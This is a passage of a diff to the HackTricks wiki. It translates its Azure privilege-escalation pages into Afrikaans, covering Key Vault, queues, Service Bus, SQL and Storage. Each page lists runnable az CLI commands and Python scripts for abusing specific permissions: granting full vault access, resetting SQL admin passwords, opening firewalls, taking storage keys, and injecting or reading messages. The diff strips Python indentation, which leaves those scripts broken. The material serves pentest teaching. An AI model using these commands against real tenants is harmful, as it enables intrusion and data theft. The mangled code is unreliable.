{{#ref}} ../az-services/keyvault.md @@ -12,8 +12,7 @@ For more information about this service check: ### Microsoft.KeyVault/vaults/write -An attacker with this permission will be able to modify the policy of a key vault (the key vault must be using access policies instead of RBAC). - +'n Aanvaller met hierdie toestemming sal in staat wees om die beleid van 'n sleutelkluis te wysig (die sleutelkluis moet toegangbeleide gebruik in plaas van RBAC). ```bash # If access policies in the output, then you can abuse it az keyvault show --name @@ -23,16 +22,11 @@ az ad signed-in-user show --query id --output tsv # Assign all permissions az keyvault set-policy \ - --name \ - --object-id \ - --key-permissions all \ - --secret-permissions all \ - --certificate-permissions all \ - --storage-permissions all +--name \ +--object-id \ +--key-permissions all \ +--secret-permissions all \ +--certificate-permissions all \ +--storage-permissions all ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md index db0b051cb..23ec4963f 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md @@ -4,7 +4,7 @@ ## Queue -For more information check: +Vir meer inligting, kyk: {{#ref}} ../az-services/az-queue-enum.md @@ -12,50 +12,41 @@ For more information check: ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/read` -An attacker with this permission can peek messages from an Azure Storage Queue. This allows the attacker to view the content of messages without marking them as processed or altering their state. This could lead to unauthorized access to sensitive information, enabling data exfiltration or gathering intelligence for further attacks. - +'n Aanvaller met hierdie toestemming kan boodskappe van 'n Azure Storage Queue afkyk. Dit stel die aanvaller in staat om die inhoud van boodskappe te sien sonder om dit as verwerk te merk of hul toestand te verander. Dit kan lei tot ongemagtigde toegang tot sensitiewe inligting, wat data-exfiltrasie of die versameling van intelligensie vir verdere aanvalle moontlik maak. ```bash az storage message peek --queue-name --account-name ``` - -**Potential Impact**: Unauthorized access to the queue, message exposure, or queue manipulation by unauthorized users or services. +**Potensiële Impak**: Onbevoegde toegang tot die wag, boodskapblootstelling, of wagmanipulasie deur onbevoegde gebruikers of dienste. ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/process/action` -With this permission, an attacker can retrieve and process messages from an Azure Storage Queue. This means they can read the message content and mark it as processed, effectively hiding it from legitimate systems. This could lead to sensitive data being exposed, disruptions in how messages are handled, or even stopping important workflows by making messages unavailable to their intended users. - +Met hierdie toestemming kan 'n aanvaller boodskappe van 'n Azure Storage Queue onttrek en verwerk. Dit beteken hulle kan die boodskapinhoud lees en dit as verwerk merk, wat dit effektief verberg van wettige stelsels. Dit kan lei tot die blootstelling van sensitiewe data, onderbrekings in hoe boodskappe hanteer word, of selfs die stop van belangrike werksvloei deur boodskappe onbeskikbaar te maak vir hul beoogde gebruikers. ```bash az storage message get --queue-name --account-name ``` - ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/add/action` -With this permission, an attacker can add new messages to an Azure Storage Queue. This allows them to inject malicious or unauthorized data into the queue, potentially triggering unintended actions or disrupting downstream services that process the messages. - +Met hierdie toestemming kan 'n aanvaller nuwe boodskappe by 'n Azure Storage Queue voeg. Dit stel hulle in staat om kwaadwillige of nie-geautoriseerde data in die queue in te spuit, wat moontlik onbedoelde aksies kan ontketen of afgeleide dienste wat die boodskappe verwerk, kan ontwrig. ```bash az storage message put --queue-name --content "Injected malicious message" --account-name ``` - ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/write` -This permission allows an attacker to add new messages or update existing ones in an Azure Storage Queue. By using this, they could insert harmful content or alter existing messages, potentially misleading applications or causing undesired behaviors in systems that rely on the queue. - +Hierdie toestemming laat 'n aanvaller toe om nuwe boodskappe by te voeg of bestaande te werk in 'n Azure Storage Queue. Deur dit te gebruik, kan hulle skadelike inhoud invoeg of bestaande boodskappe verander, wat moontlik toepassings kan mislei of ongewenste gedrag in stelsels wat op die queue staatmaak, kan veroorsaak. ```bash az storage message put --queue-name --content "Injected malicious message" --account-name #Update the message az storage message update --queue-name \ - --id \ - --pop-receipt \ - --content "Updated message content" \ - --visibility-timeout \ - --account-name +--id \ +--pop-receipt \ +--content "Updated message content" \ +--visibility-timeout \ +--account-name ``` - ### Action: `Microsoft.Storage/storageAccounts/queueServices/queues/write` -This permission allows an attacker to create or modify queues and their properties within the storage account. It can be used to create unauthorized queues, modify metadata, or change access control lists (ACLs) to grant or restrict access. This capability could disrupt workflows, inject malicious data, exfiltrate sensitive information, or manipulate queue settings to enable further attacks. - +Hierdie toestemming laat 'n aanvaller toe om rye en hul eienskappe binne die stoorrekening te skep of te wysig. Dit kan gebruik word om ongeoorloofde rye te skep, metadata te wysig, of toegangbeheerlyste (ACLs) te verander om toegang toe te staan of te beperk. Hierdie vermoë kan werksvloei onderbreek, kwaadwillige data inspuit, sensitiewe inligting eksfiltreer, of ryinstellings manipuleer om verdere aanvalle moontlik te maak. ```bash az storage queue create --name --account-name @@ -63,15 +54,10 @@ az storage queue metadata update --name --metadata key1=value1 key2 az storage queue policy set --name --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name ``` - -## References +## Verwysings - https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues - https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api - https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md index bee8aff28..06be7c993 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md @@ -4,16 +4,15 @@ ## Service Bus -For more information check: +Vir meer inligting, kyk: {{#ref}} ../az-services/az-servicebus-enum.md {{#endref}} -### Send Messages. Action: `Microsoft.ServiceBus/namespaces/authorizationRules/listkeys/action` OR `Microsoft.ServiceBus/namespaces/authorizationRules/regenerateKeys/action` - -You can retrieve the `PrimaryConnectionString`, which acts as a credential for the Service Bus namespace. With this connection string, you can fully authenticate as the Service Bus namespace, enabling you to send messages to any queue or topic and potentially interact with the system in ways that could disrupt operations, impersonate valid users, or inject malicious data into the messaging workflow. +### Stuur Berigte. Aksie: `Microsoft.ServiceBus/namespaces/authorizationRules/listkeys/action` OF `Microsoft.ServiceBus/namespaces/authorizationRules/regenerateKeys/action` +Jy kan die `PrimaryConnectionString` verkry, wat as 'n geloofsbrief vir die Service Bus-namespace dien. Met hierdie verbindingsstring kan jy ten volle outentiseer as die Service Bus-namespace, wat jou in staat stel om boodskappe na enige wachtrij of onderwerp te stuur en moontlik met die stelsel te kommunikeer op maniere wat bedrywighede kan ontwrig, geldige gebruikers kan naboots, of kwaadwillige data in die boodskapwerkvloei kan inspuit. ```python #You need to install the following libraries #pip install azure-servicebus @@ -30,51 +29,51 @@ TOPIC_NAME = "" # Function to send a single message to a Service Bus topic async def send_individual_message(publisher): - # Prepare a single message with updated content - single_message = ServiceBusMessage("Hacktricks-Training: Single Item") - # Send the message to the topic - await publisher.send_messages(single_message) - print("Sent a single message containing 'Hacktricks-Training'") +# Prepare a single message with updated content +single_message = ServiceBusMessage("Hacktricks-Training: Single Item") +# Send the message to the topic +await publisher.send_messages(single_message) +print("Sent a single message containing 'Hacktricks-Training'") # Function to send multiple messages to a Service Bus topic async def send_multiple_messages(publisher): - # Generate a collection of messages with updated content - message_list = [ServiceBusMessage(f"Hacktricks-Training: Item {i+1} in list") for i in range(5)] - # Send the entire collection of messages to the topic - await publisher.send_messages(message_list) - print("Sent a list of 5 messages containing 'Hacktricks-Training'") +# Generate a collection of messages with updated content +message_list = [ServiceBusMessage(f"Hacktricks-Training: Item {i+1} in list") for i in range(5)] +# Send the entire collection of messages to the topic +await publisher.send_messages(message_list) +print("Sent a list of 5 messages containing 'Hacktricks-Training'") # Function to send a grouped batch of messages to a Service Bus topic async def send_grouped_messages(publisher): - # Send a grouped batch of messages with updated content - async with publisher: - grouped_message_batch = await publisher.create_message_batch() - for i in range(10): - try: - # Append a message to the batch with updated content - grouped_message_batch.add_message(ServiceBusMessage(f"Hacktricks-Training: Item {i+1}")) - except ValueError: - # If batch reaches its size limit, handle by creating another batch - break - # Dispatch the batch of messages to the topic - await publisher.send_messages(grouped_message_batch) - print("Sent a batch of 10 messages containing 'Hacktricks-Training'") +# Send a grouped batch of messages with updated content +async with publisher: +grouped_message_batch = await publisher.create_message_batch() +for i in range(10): +try: +# Append a message to the batch with updated content +grouped_message_batch.add_message(ServiceBusMessage(f"Hacktricks-Training: Item {i+1}")) +except ValueError: +# If batch reaches its size limit, handle by creating another batch +break +# Dispatch the batch of messages to the topic +await publisher.send_messages(grouped_message_batch) +print("Sent a batch of 10 messages containing 'Hacktricks-Training'") # Main function to execute all tasks async def execute(): - # Instantiate the Service Bus client with the connection string - async with ServiceBusClient.from_connection_string( - conn_str=NAMESPACE_CONNECTION_STR, - logging_enable=True) as sb_client: - # Create a topic sender for dispatching messages to the topic - publisher = sb_client.get_topic_sender(topic_name=TOPIC_NAME) - async with publisher: - # Send a single message - await send_individual_message(publisher) - # Send multiple messages - await send_multiple_messages(publisher) - # Send a batch of messages - await send_grouped_messages(publisher) +# Instantiate the Service Bus client with the connection string +async with ServiceBusClient.from_connection_string( +conn_str=NAMESPACE_CONNECTION_STR, +logging_enable=True) as sb_client: +# Create a topic sender for dispatching messages to the topic +publisher = sb_client.get_topic_sender(topic_name=TOPIC_NAME) +async with publisher: +# Send a single message +await send_individual_message(publisher) +# Send multiple messages +await send_multiple_messages(publisher) +# Send a batch of messages +await send_grouped_messages(publisher) # Run the asynchronous execution asyncio.run(execute()) @@ -82,11 +81,9 @@ print("Messages Sent") print("----------------------------") ``` +### Ontvang Berigte. Aksie: `Microsoft.ServiceBus/namespaces/authorizationRules/listkeys/action` OF `Microsoft.ServiceBus/namespaces/authorizationRules/regenerateKeys/action` -### Recieve Messages. Action: `Microsoft.ServiceBus/namespaces/authorizationRules/listkeys/action` OR `Microsoft.ServiceBus/namespaces/authorizationRules/regenerateKeys/action` - -You can retrieve the PrimaryConnectionString, which serves as a credential for the Service Bus namespace. Using this connection string, you can receive messages from any queue or subscription within the namespace, allowing access to potentially sensitive or critical data, enabling data exfiltration, or interfering with message processing and application workflows. - +Jy kan die PrimaryConnectionString verkry, wat as 'n geloofsbrief vir die Service Bus-namespace dien. Met hierdie verbindingsstring kan jy berigte ontvang van enige wachtrij of subskripsie binne die namespace, wat toegang tot potensieel sensitiewe of kritieke data moontlik maak, wat data-exfiltrasie moontlik maak, of inmenging met boodskapverwerking en toepassingswerkvloei. ```python #You need to install the following libraries #pip install azure-servicebus @@ -102,48 +99,45 @@ SUBSCRIPTION_NAME = "" #Topic Subscription # Function to receive and process messages from a Service Bus subscription async def receive_and_process_messages(): - # Create a Service Bus client using the connection string - async with ServiceBusClient.from_connection_string( - conn_str=NAMESPACE_CONNECTION_STR, - logging_enable=True) as servicebus_client: +# Create a Service Bus client using the connection string +async with ServiceBusClient.from_connection_string( +conn_str=NAMESPACE_CONNECTION_STR, +logging_enable=True) as servicebus_client: - # Get the Subscription Receiver object for the specified topic and subscription - receiver = servicebus_client.get_subscription_receiver( - topic_name=TOPIC_NAME, - subscription_name=SUBSCRIPTION_NAME, - max_wait_time=5 - ) +# Get the Subscription Receiver object for the specified topic and subscription +receiver = servicebus_client.get_subscription_receiver( +topic_name=TOPIC_NAME, +subscription_name=SUBSCRIPTION_NAME, +max_wait_time=5 +) - async with receiver: - # Receive messages with a defined maximum wait time and count - received_msgs = await receiver.receive_messages( - max_wait_time=5, - max_message_count=20 - ) - for msg in received_msgs: - print("Received: " + str(msg)) - # Complete the message to remove it from the subscription - await receiver.complete_message(msg) +async with receiver: +# Receive messages with a defined maximum wait time and count +received_msgs = await receiver.receive_messages( +max_wait_time=5, +max_message_count=20 +) +for msg in received_msgs: +print("Received: " + str(msg)) +# Complete the message to remove it from the subscription +await receiver.complete_message(msg) # Run the asynchronous message processing function asyncio.run(receive_and_process_messages()) print("Message Receiving Completed") print("----------------------------") ``` - ### `Microsoft.ServiceBus/namespaces/authorizationRules/write` & `Microsoft.ServiceBus/namespaces/authorizationRules/write` -If you have these permissions, you can escalate privileges by reading or creating shared access keys. These keys allow full control over the Service Bus namespace, including managing queues, topics, and sending/receiving messages, potentially bypassing role-based access controls (RBAC). - +As jy hierdie toestemmings het, kan jy voorregte opgradeer deur gedeelde toegang sleutels te lees of te skep. Hierdie sleutels stel volle beheer oor die Service Bus naamruimte in, insluitend die bestuur van rye, onderwerpe, en die stuur/ontvang van boodskappe, wat moontlik rolgebaseerde toegangbeheer (RBAC) kan omseil. ```bash az servicebus namespace authorization-rule update \ - --resource-group \ - --namespace-name \ - --name RootManageSharedAccessKey \ - --rights Manage Listen Send +--resource-group \ +--namespace-name \ +--name RootManageSharedAccessKey \ +--rights Manage Listen Send ``` - -## References +## Verwysings - https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues - https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api @@ -152,7 +146,3 @@ az servicebus namespace authorization-rule update \ - https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/integration#microsoftservicebus {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md index 76dbfdcfd..41e8f5725 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md @@ -4,7 +4,7 @@ ## SQL Database Privesc -For more information about SQL Database check: +Vir meer inligting oor SQL Database, kyk: {{#ref}} ../az-services/az-sql.md @@ -12,104 +12,88 @@ For more information about SQL Database check: ### "Microsoft.Sql/servers/read" && "Microsoft.Sql/servers/write" -With these permissions, a user can perform privilege escalation by updating or creating Azure SQL servers and modifying critical configurations, including administrative credentials. This permission allows the user to update server properties, including the SQL server admin password, enabling unauthorized access or control over the server. They can also create new servers, potentially introducing shadow infrastructure for malicious purposes. This becomes particularly critical in environments where "Microsoft Entra Authentication Only" is disabled, as they can exploit SQL-based authentication to gain unrestricted access. - +Met hierdie toestemmings kan 'n gebruiker privilige-eskalasie uitvoer deur Azure SQL-bedieners op te dateer of te skep en kritieke konfigurasies te wysig, insluitend administratiewe akrediteer. Hierdie toestemming stel die gebruiker in staat om bediener eienskappe op te dateer, insluitend die SQL-bediener administrateur wagwoord, wat ongeoorloofde toegang of beheer oor die bediener moontlik maak. Hulle kan ook nuwe bedieners skep, wat potensieel skadu-infrastruktuur vir kwaadwillige doeleindes kan inbring. Dit word veral krities in omgewings waar "Microsoft Entra Authentication Only" gedeaktiveer is, aangesien hulle SQL-gebaseerde verifikasie kan benut om onbeperkte toegang te verkry. ```bash # Change the server password az sql server update \ - --name \ - --resource-group \ - --admin-password +--name \ +--resource-group \ +--admin-password # Create a new server az sql server create \ - --name \ - --resource-group \ - --location \ - --admin-user \ - --admin-password +--name \ +--resource-group \ +--location \ +--admin-user \ +--admin-password ``` - -Additionally it is necesary to have the public access enabled if you want to access from a non private endpoint, to enable it: - +Daarnaast is dit nodig om die publieke toegang in te skakel as jy vanaf 'n nie-private eindpunt wil toegang verkry, om dit in te skakel: ```bash az sql server update \ - --name \ - --resource-group \ - --enable-public-network true +--name \ +--resource-group \ +--enable-public-network true ``` - ### "Microsoft.Sql/servers/firewallRules/write" -An attacker can manipulate firewall rules on Azure SQL servers to allow unauthorized access. This can be exploited to open up the server to specific IP addresses or entire IP ranges, including public IPs, enabling access for malicious actors. This post-exploitation activity can be used to bypass existing network security controls, establish persistence, or facilitate lateral movement within the environment by exposing sensitive resources. - +'n Aanvaller kan firewallreëls op Azure SQL-bedieners manipuleer om ongeoorloofde toegang toe te laat. Dit kan uitgebuit word om die bediener oop te maak vir spesifieke IP-adresse of hele IP-reekse, insluitend openbare IP's, wat toegang vir kwaadwillige akteurs moontlik maak. Hierdie post-uitbuiting aktiwiteit kan gebruik word om bestaande netwerkveiligheidsbeheer te omseil, volharding te vestig, of laterale beweging binne die omgewing te fasiliteer deur sensitiewe hulpbronne bloot te stel. ```bash # Create Firewall Rule az sql server firewall-rule create \ - --name \ - --server \ - --resource-group \ - --start-ip-address \ - --end-ip-address +--name \ +--server \ +--resource-group \ +--start-ip-address \ +--end-ip-address # Update Firewall Rule az sql server firewall-rule update \ - --name \ - --server \ - --resource-group \ - --start-ip-address \ - --end-ip-address +--name \ +--server \ +--resource-group \ +--start-ip-address \ +--end-ip-address ``` - -Additionally, `Microsoft.Sql/servers/outboundFirewallRules/delete` permission lets you delete a Firewall Rule. -NOTE: It is necesary to have the public access enabled +Additionally, `Microsoft.Sql/servers/outboundFirewallRules/delete` toestemming laat jou toe om 'n Firewall Regel te verwyder. +NOTE: Dit is nodig om die publieke toegang geaktiveer te hê. ### ""Microsoft.Sql/servers/ipv6FirewallRules/write" -With this permission, you can create, modify, or delete IPv6 firewall rules on an Azure SQL Server. This could enable an attacker or authorized user to bypass existing network security configurations and gain unauthorized access to the server. By adding a rule that allows traffic from any IPv6 address, the attacker could open the server to external access." - +Met hierdie toestemming kan jy IPv6 firewall reëls op 'n Azure SQL Server skep, wysig of verwyder. Dit kan 'n aanvaller of gemagtigde gebruiker in staat stel om bestaande netwerk sekuriteitskonfigurasies te omseil en ongemagtigde toegang tot die bediener te verkry. Deur 'n reël toe te voeg wat verkeer van enige IPv6 adres toelaat, kan die aanvaller die bediener oopmaak vir eksterne toegang. ```bash az sql server firewall-rule create \ - --server \ - --resource-group \ - --name \ - --start-ip-address \ - --end-ip-address +--server \ +--resource-group \ +--name \ +--start-ip-address \ +--end-ip-address ``` - -Additionally, `Microsoft.Sql/servers/ipv6FirewallRules/delete` permission lets you delete a Firewall Rule. -NOTE: It is necesary to have the public access enabled +Additionally, `Microsoft.Sql/servers/ipv6FirewallRules/delete` toestemming laat jou toe om 'n Firewall Reël te verwyder. +NOTE: Dit is nodig om die publieke toegang geaktiveer te hê. ### "Microsoft.Sql/servers/administrators/write" && "Microsoft.Sql/servers/administrators/read" -With this permissions you can privesc in an Azure SQL Server environment accessing to SQL databases and retrieven critical information. Using the the command below, an attacker or authorized user can set themselves or another account as the Azure AD administrator. If "Microsoft Entra Authentication Only" is enabled you are albe to access the server and its instances. Here's the command to set the Azure AD administrator for an SQL server: - +Met hierdie toestemmings kan jy privesc in 'n Azure SQL Server omgewing deur toegang te verkry tot SQL databasisse en kritieke inligting te onttrek. Deur die onderstaande opdrag te gebruik, kan 'n aanvaller of gemagtigde gebruiker hulself of 'n ander rekening as die Azure AD administrateur stel. As "Microsoft Entra Authentication Only" geaktiveer is, kan jy toegang tot die bediener en sy instansies verkry. Hier is die opdrag om die Azure AD administrateur vir 'n SQL bediener in te stel: ```bash az sql server ad-admin create \ - --server \ - --resource-group \ - --display-name \ - --object-id +--server \ +--resource-group \ +--display-name \ +--object-id ``` - ### "Microsoft.Sql/servers/azureADOnlyAuthentications/write" && "Microsoft.Sql/servers/azureADOnlyAuthentications/read" -With these permissions, you can configure and enforce "Microsoft Entra Authentication Only" on an Azure SQL Server, which could facilitate privilege escalation in certain scenarios. An attacker or an authorized user with these permissions can enable or disable Azure AD-only authentication. - +Met hierdie toestemmings kan jy "Microsoft Entra Authentication Only" op 'n Azure SQL Server konfigureer en afdwing, wat privilige-escalasie in sekere scenario's kan vergemaklik. 'n Aanvaller of 'n gemagtigde gebruiker met hierdie toestemmings kan Azure AD-slegs verifikasie aktiveer of deaktiveer. ```bash #Enable az sql server azure-ad-only-auth enable \ - --server \ - --resource-group +--server \ +--resource-group #Disable az sql server azure-ad-only-auth disable \ - --server \ - --resource-group +--server \ +--resource-group ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md index c2545f9e2..d09043779 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md @@ -4,7 +4,7 @@ ## Storage Privesc -For more information about storage check: +Vir meer inligting oor berging, kyk: {{#ref}} ../az-services/az-storage.md @@ -12,26 +12,21 @@ For more information about storage check: ### Microsoft.Storage/storageAccounts/listkeys/action -A principal with this permission will be able to list (and the secret values) of the **access keys** of the storage accounts. Allowing the principal to escalate its privileges over the storage accounts. - +'n Hoofpersoon met hierdie toestemming sal in staat wees om die **toegang sleutels** van die berging rekeninge te lys (en die geheime waardes). Dit stel die hoofpersoon in staat om sy of haar voorregte oor die berging rekeninge te verhoog. ```bash az storage account keys list --account-name ``` - ### Microsoft.Storage/storageAccounts/regenerateKey/action -A principal with this permission will be able to renew and get the new secret value of the **access keys** of the storage accounts. Allowing the principal to escalate its privileges over the storage accounts. - -Moreover, in the response, the user will get the value of the renewed key and also of the not renewed one: +'n Hoofpersoon met hierdie toestemming sal in staat wees om die nuwe geheime waarde van die **toegang sleutels** van die stoor rekeninge te hernu en te verkry. Dit stel die hoofpersoon in staat om sy/haar voorregte oor die stoor rekeninge te verhoog. +Boonop sal die gebruiker in die antwoord die waarde van die hernude sleutel en ook van die nie-hernuede sleutel ontvang: ```bash az storage account keys renew --account-name --key key2 ``` - ### Microsoft.Storage/storageAccounts/write -A principal with this permission will be able to create or update an existing storage account updating any setting like network rules or policies. - +'n Hoofpersoon met hierdie toestemming sal in staat wees om 'n bestaande stoorrekening te skep of op te dateer deur enige instelling soos netwerkreëls of beleide op te dateer. ```bash # e.g. set default action to allow so network restrictions are avoided az storage account update --name --default-action Allow @@ -39,118 +34,101 @@ az storage account update --name --default-action Allow # e.g. allow an IP address az storage account update --name --add networkRuleSet.ipRules value= ``` - -## Blobs Specific privesc +## Blobs Spesifieke privesc ### Microsoft.Storage/storageAccounts/blobServices/containers/immutabilityPolicies/write | Microsoft.Storage/storageAccounts/blobServices/containers/immutabilityPolicies/delete -The first permission allows to **modify immutability policies** in containers and the second to delete them. +Die eerste toestemming stel jou in staat om **immutability policies** in houers te **wysig** en die tweede om hulle te **verwyder**. > [!NOTE] -> Note that if an immutability policy is in lock state, you cannot do neither of both - +> Let daarop dat as 'n immutability policy in 'n vergrendeltoestand is, jy nie een van beide kan doen nie. ```bash az storage container immutability-policy delete \ - --account-name \ - --container-name \ - --resource-group +--account-name \ +--container-name \ +--resource-group az storage container immutability-policy update \ - --account-name \ - --container-name \ - --resource-group \ - --period +--account-name \ +--container-name \ +--resource-group \ +--period ``` - -## File shares specific privesc +## Lêer gedeeltes spesifieke privesc ### Microsoft.Storage/storageAccounts/fileServices/takeOwnership/action -This should allow a user having this permission to be able to take the ownership of files inside the shared filesystem. +Dit behoort 'n gebruiker met hierdie toestemming in staat te stel om die eienaarskap van lêers binne die gedeelde lêerstelsel te neem. ### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/modifypermissions/action -This should allow a user having this permission to be able to modify the permissions files inside the shared filesystem. +Dit behoort 'n gebruiker met hierdie toestemming in staat te stel om die toestemmings van lêers binne die gedeelde lêerstelsel te wysig. ### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/actassuperuser/action -This should allow a user having this permission to be able to perform actions inside a file system as a superuser. +Dit behoort 'n gebruiker met hierdie toestemming in staat te stel om aksies binne 'n lêerstelsel as 'n supergebruiker uit te voer. ### Microsoft.Storage/storageAccounts/localusers/write (Microsoft.Storage/storageAccounts/localusers/read) -With this permission, an attacker can create and update (if has `Microsoft.Storage/storageAccounts/localusers/read` permission) a new local user for an Azure Storage account (configured with hierarchical namespace), including specifying the user’s permissions and home directory. This permission is significant because it allows the attacker to grant themselves to a storage account with specific permissions such as read (r), write (w), delete (d), and list (l) and more. Additionaly the authentication methods that this uses can be Azure-generated passwords and SSH key pairs. There is no check if a user already exists, so you can overwrite other users that are already there. The attacker could escalate their privileges and gain SSH access to the storage account, potentially exposing or compromising sensitive data. - +Met hierdie toestemming kan 'n aanvaller 'n nuwe plaaslike gebruiker vir 'n Azure Storage-rekening (gekonfigureer met hiërargiese naamruimte) skep en opdateer (indien hy `Microsoft.Storage/storageAccounts/localusers/read` toestemming het), insluitend die spesifisering van die gebruiker se toestemmings en tuisdirektorium. Hierdie toestemming is belangrik omdat dit die aanvaller in staat stel om hulself toegang tot 'n stoorrekening met spesifieke toestemmings soos lees (r), skryf (w), verwyder (d), en lys (l) en meer te verleen. Boonop kan die autentikasie metodes wat dit gebruik Azure-gegeneerde wagwoorde en SSH-sleutelpaar wees. Daar is geen kontrole of 'n gebruiker reeds bestaan nie, so jy kan ander gebruikers wat reeds daar is oorskryf. Die aanvaller kan hul bevoegdhede opgradeer en SSH-toegang tot die stoorrekening verkry, wat moontlik sensitiewe data blootstel of in gevaar stel. ```bash az storage account local-user create \ - --account-name \ - --resource-group \ - --name \ - --permission-scope permissions=rwdl service=blob resource-name= \ - --home-directory \ - --has-ssh-key false/true # Depends on the auth method to use +--account-name \ +--resource-group \ +--name \ +--permission-scope permissions=rwdl service=blob resource-name= \ +--home-directory \ +--has-ssh-key false/true # Depends on the auth method to use ``` - ### Microsoft.Storage/storageAccounts/localusers/regeneratePassword/action -With this permission, an attacker can regenerate the password for a local user in an Azure Storage account. This grants the attacker the ability to obtain new authentication credentials (such as an SSH or SFTP password) for the user. By leveraging these credentials, the attacker could gain unauthorized access to the storage account, perform file transfers, or manipulate data within the storage containers. This could result in data leakage, corruption, or malicious modification of the storage account content. - +Met hierdie toestemming kan 'n aanvaller die wagwoord vir 'n plaaslike gebruiker in 'n Azure Storage-rekening hernu. Dit gee die aanvaller die vermoë om nuwe autentikasie-inligting (soos 'n SSH of SFTP-wagwoord) vir die gebruiker te verkry. Deur hierdie inligting te benut, kan die aanvaller ongeoorloofde toegang tot die opslagrekening verkry, lêer oordragte uitvoer, of data binne die opslaghouers manipuleer. Dit kan lei tot data lekkasie, korrupsie, of kwaadwillige wysiging van die inhoud van die opslagrekening. ```bash az storage account local-user regenerate-password \ - --account-name \ - --resource-group \ - --name +--account-name \ +--resource-group \ +--name ``` - -To access Azure Blob Storage via SFTP using a local user via SFTP you can (you can also use ssh key to connect): - +Om toegang te verkry tot Azure Blob Storage via SFTP met 'n plaaslike gebruiker via SFTP kan jy (jy kan ook 'n ssh-sleutel gebruik om te verbind): ```bash sftp @.blob.core.windows.net #regenerated-password ``` - ### Microsoft.Storage/storageAccounts/restoreBlobRanges/action, Microsoft.Storage/storageAccounts/blobServices/containers/read, Microsoft.Storage/storageAccounts/read && Microsoft.Storage/storageAccounts/listKeys/action -With this permissions an attacker can restore a deleted container by specifying its deleted version ID or undelete specific blobs within a container, if they were previously soft-deleted. This privilege escalation could allow an attacker to recover sensitive data that was meant to be permanently deleted, potentially leading to unauthorized access. - +Met hierdie toestemmings kan 'n aanvaller 'n verwyderde houer herstel deur sy verwyderde weergawe-ID te spesifiseer of spesifieke blobs binne 'n houer te onttrek, indien hulle voorheen sag-verwyder was. Hierdie privilige-eskalasie kan 'n aanvaller in staat stel om sensitiewe data te herstel wat bedoel was om permanent verwyder te word, wat moontlik kan lei tot ongeoorloofde toegang. ```bash #Restore the soft deleted container az storage container restore \ - --account-name \ - --name \ - --deleted-version +--account-name \ +--name \ +--deleted-version #Restore the soft deleted blob az storage blob undelete \ - --account-name \ - --container-name \ - --name "fileName.txt" +--account-name \ +--container-name \ +--name "fileName.txt" ``` - ### Microsoft.Storage/storageAccounts/fileServices/shares/restore/action && Microsoft.Storage/storageAccounts/read -With these permissions, an attacker can restore a deleted Azure file share by specifying its deleted version ID. This privilege escalation could allow an attacker to recover sensitive data that was meant to be permanently deleted, potentially leading to unauthorized access. - +Met hierdie toestemmings kan 'n aanvaller 'n verwyderde Azure-lêerdeling herstel deur sy verwyderde weergawe-ID te spesifiseer. Hierdie privilige-escalasie kan 'n aanvaller in staat stel om sensitiewe data te herstel wat bedoel was om permanent verwyder te word, wat moontlik kan lei tot ongemagtigde toegang. ```bash az storage share-rm restore \ - --storage-account \ - --name \ - --deleted-version +--storage-account \ +--name \ +--deleted-version ``` +## Ander interessante lykende toestemmings (TODO) -## Other interesting looking permissions (TODO) - -- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/manageOwnership/action: Changes ownership of the blob -- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/modifyPermissions/action: Modifies permissions of the blob -- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/runAsSuperUser/action: Returns the result of the blob command +- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/manageOwnership/action: Verander eienaarskap van die blob +- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/modifyPermissions/action: Wysig toestemmings van die blob +- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/runAsSuperUser/action: Gee die resultaat van die blob opdrag - Microsoft.Storage/storageAccounts/blobServices/containers/blobs/immutableStorage/runAsSuperUser/action -## References +## Verwysings - [https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/storage#microsoftstorage](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/storage#microsoftstorage) - [https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support](https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git 